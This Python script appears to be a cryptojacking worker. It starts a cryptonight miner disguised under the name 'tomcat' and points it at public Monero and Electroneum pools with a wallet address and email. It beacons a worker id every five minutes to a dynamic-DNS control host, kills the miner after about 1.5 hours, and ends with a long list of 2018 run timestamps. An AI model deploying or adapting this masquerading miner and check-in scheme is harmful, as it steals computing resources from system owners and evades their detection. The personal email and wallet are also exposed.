import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:01.975841
#2018-02-17 16:53:05.947993
#2018-02-17 18:43:01.699030
#2018-02-17 20:31:06.179248
#2018-02-17 22:17:01.571825
#2018-02-18 00:01:02.120331
#2018-02-18 01:51:06.902760
#2018-02-18 03:39:06.195223
#2018-02-18 05:28:01.963404
#2018-02-18 07:19:05.068126
#2018-02-18 09:07:04.945036
#2018-02-18 10:53:04.386908
#2018-02-18 12:40:01.464702
#2018-02-18 14:26:06.805134
#2018-02-18 16:16:05.344349
#2018-02-18 18:04:03.828086
#2018-02-18 19:50:08.499863
#2018-02-18 21:37:04.929024
#2018-02-18 23:24:07.449738
#2018-02-19 01:11:07.225224
#2018-02-19 02:57:07.123013
#2018-02-19 04:45:09.645893
#2018-02-19 06:31:04.390290
#2018-02-19 08:19:06.055362
#2018-02-19 10:08:05.101430
#2018-02-19 11:57:02.116891
#2018-02-19 13:44:01.944864
#2018-02-19 15:33:01.754718
#2018-02-19 17:20:07.770341
#2018-02-19 19:09:01.788467
#2018-02-19 20:54:01.611819
#2018-02-19 22:43:05.973516
#2018-02-20 00:26:06.920187
#2018-02-20 02:15:08.029491
#2018-02-20 04:06:08.175960
#2018-02-20 05:49:08.135360
#2018-02-20 07:36:06.139280
#2018-02-20 09:20:06.907685
#2018-02-20 11:04:07.382778
#2018-02-20 12:50:10.543906
#2018-02-20 14:35:01.515504
#2018-02-20 16:18:09.334587
#2018-02-20 18:04:04.444054
#2018-02-20 19:54:07.294806
#2018-02-20 21:41:06.992714
#2018-02-20 23:23:05.034818
#2018-02-21 01:07:05.307933
#2018-02-21 02:54:03.967709
#2018-02-21 04:42:04.117742
#2018-02-21 06:30:01.512923
#2018-02-21 08:15:09.327112
#2018-02-21 10:01:05.823058
#2018-02-21 11:49:01.382043
#2018-02-21 13:39:06.915803
#2018-02-21 15:23:06.358401
#2018-02-21 17:15:07.050935
#2018-02-21 19:02:07.033409
#2018-02-21 20:51:04.088316
#2018-02-21 22:37:05.843133
#2018-02-22 00:27:04.151728
#2018-02-22 02:14:07.857369
#2018-02-22 04:01:08.595755
#2018-02-22 05:47:07.122297
#2018-02-22 07:32:07.872419
#2018-02-22 09:19:01.944351
#2018-02-22 11:06:02.142925
#2018-02-22 12:53:13.624057
#2018-02-22 14:39:05.882422
#2018-02-22 16:24:01.803152
#2018-02-22 18:10:10.444793
#2018-02-22 19:58:06.048279
#2018-02-22 21:47:07.618301
#2018-02-22 23:36:03.947993
#2018-02-23 01:25:01.350708
#2018-02-23 03:10:08.777510
#2018-02-23 04:56:06.266885
#2018-02-23 06:42:03.939935
#2018-02-23 08:32:08.182086
#2018-02-23 10:47:08.396326
#2018-02-23 12:46:01.286778
#2018-02-23 14:29:01.256056
#2018-02-23 16:20:04.393802
#2018-02-23 18:08:05.733725
#2018-02-23 19:53:07.263518
#2018-02-23 21:37:01.304062
#2018-02-23 23:25:08.533948
#2018-02-24 01:33:04.494006
#2018-02-24 03:22:07.774859
#2018-02-24 05:07:01.704647
#2018-02-24 06:56:06.123476
#2018-02-24 08:46:05.980782
#2018-02-24 10:47:01.949737
#2018-02-24 12:34:04.821021
#2018-02-24 14:23:01.966940
#2018-02-24 16:11:04.773954
#2018-02-24 18:03:01.530148
#2018-02-24 19:49:07.448725
#2018-02-24 21:34:01.853015
#2018-02-25 00:22:07.071677
#2018-02-25 04:08:07.813126
#2018-02-25 07:39:06.402308